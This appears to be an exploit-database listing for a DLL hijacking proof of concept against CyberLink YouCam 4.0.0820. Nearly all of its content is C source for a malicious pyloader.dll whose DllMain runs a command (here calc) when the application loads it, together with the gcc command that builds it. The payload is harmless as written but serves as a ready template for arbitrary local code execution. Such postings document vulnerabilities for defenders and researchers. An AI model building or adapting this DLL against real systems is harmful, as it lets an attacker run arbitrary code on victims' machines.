CyberLink YouCam 4.0.0820 DLL Hijacking Exploit (pyloader.dll)

2015.09.02
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

/* Exploit Title : CyberLink YouCam 4.0.0820 DLL Hijacking Exploit (pyloader.dll) Exploit Author : Febriyanto Nugroho Tested on : Windows 7 Ultimate (32-bit) gcc -shared -o pyloader.dll youcam-DLL.c */ #include <windows.h> int fuck(){ WinExec("calc", 0); exit(0); return 0; } BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved){ fuck(); return 0; }


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top